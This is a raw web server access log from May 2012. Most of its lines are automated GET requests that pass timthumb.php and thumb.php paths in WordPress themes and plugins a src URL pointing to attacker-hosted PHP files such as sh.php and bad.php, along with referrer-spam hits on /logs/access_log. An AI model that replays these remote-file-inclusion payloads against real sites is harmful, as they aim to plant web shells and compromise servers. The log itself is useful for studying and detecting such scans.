216.70.71.78 - - [14/May/2012:09:51:37 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:09:51:40 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:09:51:40 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:09:51:40 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:09:51:40 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:09:51:41 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:09:51:41 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:53:40 +0200] "GET /stats//wp-content/themes/neo_wdl/includes/extensions/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 344 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:53:40 +0200] "GET /stats//wp-content/themes/neo_wdl/includes/extensions/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 344 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:53:40 +0200] "GET /stats//wp-content/themes/neo_wdl/includes/extensions/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 344 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:53:41 +0200] "GET //wp-content/themes/neo_wdl/includes/extensions/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:53:41 +0200] "GET //wp-content/themes/neo_wdl/includes/extensions/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:53:41 +0200] "GET //wp-content/themes/neo_wdl/includes/extensions/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.170.147.12 - - [14/May/2012:09:54:19 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://picasa.com.djnick-mcgiany.com/mct.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
184.170.147.12 - - [14/May/2012:09:54:20 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://picasa.com.djnick-mcgiany.com/dm.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
216.69.224.11 - - [14/May/2012:09:55:29 +0200] "GET /stats//wp-content/themes/Feather/timthumb.php?src=http://picasa.com.hidro-ronda.com/lin.php HTTP/1.1" 404 327 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:29 +0200] "GET /stats//wp-content/themes/Feather/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 327 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:30 +0200] "GET /stats//wp-content/themes/Feather/thumb.php?src=http://picasa.com.hidro-ronda.com/lin.php HTTP/1.1" 404 324 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:30 +0200] "GET /stats//wp-content/themes/Feather/thumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 324 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:32 +0200] "GET /stats//wp-content/themes/Feather/timthumb.php?src=http://picasa.com.hidro-ronda.com/nina.php HTTP/1.1" 404 327 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:32 +0200] "GET /stats//wp-content/themes/Feather/thumb.php?src=http://picasa.com.hidro-ronda.com/nina.php HTTP/1.1" 404 324 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:33 +0200] "GET //wp-content/themes/Feather/timthumb.php?src=http://picasa.com.hidro-ronda.com/lin.php HTTP/1.1" 404 321 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:33 +0200] "GET //wp-content/themes/Feather/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 321 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:34 +0200] "GET //wp-content/themes/Feather/thumb.php?src=http://picasa.com.hidro-ronda.com/lin.php HTTP/1.1" 404 318 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:34 +0200] "GET //wp-content/themes/Feather/thumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 318 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:35 +0200] "GET //wp-content/themes/Feather/timthumb.php?src=http://picasa.com.hidro-ronda.com/nina.php HTTP/1.1" 404 321 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:09:55:36 +0200] "GET //wp-content/themes/Feather/thumb.php?src=http://picasa.com.hidro-ronda.com/nina.php HTTP/1.1" 404 318 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
95.132.213.162 - - [14/May/2012:09:55:36 +0200] "GET /logs/access_log HTTP/1.0" 200 1901757 "http://androidelsoft.info/sitemap21.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)"
95.132.213.162 - - [14/May/2012:09:55:39 +0200] "GET /logs/access_log HTTP/1.0" 200 1901988 "http://androidelsoft.info/sitemap21.html" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"
95.132.213.162 - - [14/May/2012:09:55:42 +0200] "GET /logs/access_log HTTP/1.0" 200 1902215 "http://androidelsoft.info/sitemap21.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0"
95.132.213.162 - - [14/May/2012:09:55:48 +0200] "GET /logs/access_log HTTP/1.0" 200 1902464 "http://androidelsoft.info/sitemap21.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6"
95.132.213.162 - - [14/May/2012:09:55:50 +0200] "GET /logs/access_log HTTP/1.0" 200 1902686 "http://androidelsoft.info/sitemap21.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
78.137.37.171 - - [14/May/2012:09:56:24 +0200] "GET /logs/access_log HTTP/1.0" 200 1902924 "http://androidusplay.info/sitemap161.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)"
78.137.37.171 - - [14/May/2012:09:56:25 +0200] "GET /logs/access_log HTTP/1.0" 200 1903137 "http://androidusplay.info/sitemap161.html" "Mozilla/0.91 Beta (Windows)"
78.137.37.171 - - [14/May/2012:09:56:26 +0200] "GET /logs/access_log HTTP/1.0" 200 1903302 "http://androidusplay.info/sitemap161.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:09:56:26 +0200] "GET /logs/access_log HTTP/1.0" 200 1903528 "http://androidusplay.info/sitemap161.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
78.137.37.171 - - [14/May/2012:09:56:27 +0200] "GET /logs/access_log HTTP/1.0" 200 1903740 "http://androidusplay.info/sitemap161.html" "Mozilla/0.6 Beta (Windows)"
46.45.138.202 - - [14/May/2012:09:56:35 +0200] "GET /stats//wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:09:56:36 +0200] "GET //wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:09:57:58 +0200] "GET /stats//wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:57:58 +0200] "GET /stats//wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:57:59 +0200] "GET /stats//wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:57:59 +0200] "GET /stats//wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:09:57:59 +0200] "GET //wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:57:59 +0200] "GET //wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:58:00 +0200] "GET //wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:09:58:00 +0200] "GET //wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.171.33.81 - - [14/May/2012:09:59:09 +0200] "GET /stats//wp-content/themes/listings/thumb.php?src=http://picasa.combos.orgasmguide.org/byroe.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
81.171.33.81 - - [14/May/2012:09:59:11 +0200] "GET //wp-content/themes/listings/thumb.php?src=http://picasa.combos.orgasmguide.org/byroe.php HTTP/1.1" 404 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
90.198.87.118 - - [14/May/2012:09:59:22 +0200] "GET /stats/log.keys.html//wp-content/themes/widescreen/includes/temp/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:09:59:23 +0200] "GET /stats/log.keys.html//wp-content/themes/widescreen/includes/temp/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:09:59:25 +0200] "GET //wp-content/themes/widescreen/includes/temp/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:09:59:26 +0200] "GET //wp-content/themes/widescreen/includes/temp/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:09:59:28 +0200] "GET /stats//wp-content/themes/widescreen/includes/temp/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 344 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:09:59:29 +0200] "GET /stats//wp-content/themes/widescreen/includes/temp/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 344 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
216.70.71.78 - - [14/May/2012:10:00:02 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src= HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:00:02 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:00:02 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:00:02 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src= HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:00:02 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:00:02 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:00:02 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src= HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:00:02 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:00:03 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:00:03 +0200] "GET /stats/wp-content/themes/skeptical/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:00:03 +0200] "GET /wp-content/themes/skeptical/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:00:03 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src= HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:00:03 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:00:04 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:10:01:26 +0200] "GET /logs/access_log HTTP/1.0" 200 1912799 "http://androidusplay.info/sitemap168.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:10:01:27 +0200] "GET /logs/access_log HTTP/1.0" 200 1913025 "http://androidusplay.info/sitemap168.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)"
78.137.37.171 - - [14/May/2012:10:01:28 +0200] "GET /logs/access_log HTTP/1.0" 200 1913219 "http://androidusplay.info/sitemap168.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:10:01:29 +0200] "GET /logs/access_log HTTP/1.0" 200 1913439 "http://androidusplay.info/sitemap168.html" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
78.137.37.171 - - [14/May/2012:10:01:29 +0200] "GET /logs/access_log HTTP/1.0" 200 1913642 "http://androidusplay.info/sitemap168.html" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)"
193.107.36.80 - - [14/May/2012:10:03:31 +0200] "GET /stats//wp-content/themes/mymag/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 325 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
193.107.36.80 - - [14/May/2012:10:03:33 +0200] "GET //wp-content/themes/mymag/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 319 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
46.32.226.166 - - [14/May/2012:10:03:35 +0200] "GET /stats//wp-content/themes/mymag/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 325 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
46.32.226.166 - - [14/May/2012:10:03:36 +0200] "GET //wp-content/themes/mymag/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 319 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
79.143.179.218 - - [14/May/2012:10:05:01 +0200] "GET /stats/wp-content/themes/skeptical/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:05:01 +0200] "GET /wp-content/themes/skeptical/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:10:05:12 +0200] "GET /stats//wp-content/themes/newspress/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:10:05:14 +0200] "GET //wp-content/themes/newspress/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:10:06:17 +0200] "GET /logs/access_log HTTP/1.0" 200 1915722 "http://androidusplay.info/sitemap175.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
78.137.37.171 - - [14/May/2012:10:06:18 +0200] "GET /logs/access_log HTTP/1.0" 200 1915924 "http://androidusplay.info/sitemap175.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0"
78.137.37.171 - - [14/May/2012:10:06:19 +0200] "GET /logs/access_log HTTP/1.0" 200 1916173 "http://androidusplay.info/sitemap175.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
78.137.37.171 - - [14/May/2012:10:06:19 +0200] "GET /logs/access_log HTTP/1.0" 200 1916376 "http://androidusplay.info/sitemap175.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:10:06:20 +0200] "GET /logs/access_log HTTP/1.0" 200 1916602 "http://androidusplay.info/sitemap175.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)"
46.45.138.202 - - [14/May/2012:10:06:36 +0200] "GET /stats//wp-content/themes/newspress/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:10:06:38 +0200] "GET //wp-content/themes/newspress/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:10:06:47 +0200] "GET /stats//wp-content/themes/newspress/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:10:06:48 +0200] "GET /stats//wp-content/themes/newspress/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:10:06:48 +0200] "GET /stats//wp-content/themes/newspress/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:10:06:48 +0200] "GET //wp-content/themes/newspress/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:10:06:49 +0200] "GET //wp-content/themes/newspress/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:10:06:49 +0200] "GET //wp-content/themes/newspress/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:10:08:31 +0200] "GET /logs/access_log HTTP/1.0" 200 1918866 "http://androidelsoft.info/sitemap28.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
95.132.213.162 - - [14/May/2012:10:08:36 +0200] "GET /logs/access_log HTTP/1.0" 200 1919071 "http://androidelsoft.info/sitemap28.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)"
95.132.213.162 - - [14/May/2012:10:08:42 +0200] "GET /logs/access_log HTTP/1.0" 200 1919278 "http://androidelsoft.info/sitemap28.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
95.132.213.162 - - [14/May/2012:10:08:49 +0200] "GET /logs/access_log HTTP/1.0" 200 1919490 "http://androidelsoft.info/sitemap28.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
95.132.213.162 - - [14/May/2012:10:08:52 +0200] "GET /logs/access_log HTTP/1.0" 200 1919490 "http://androidelsoft.info/sitemap28.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
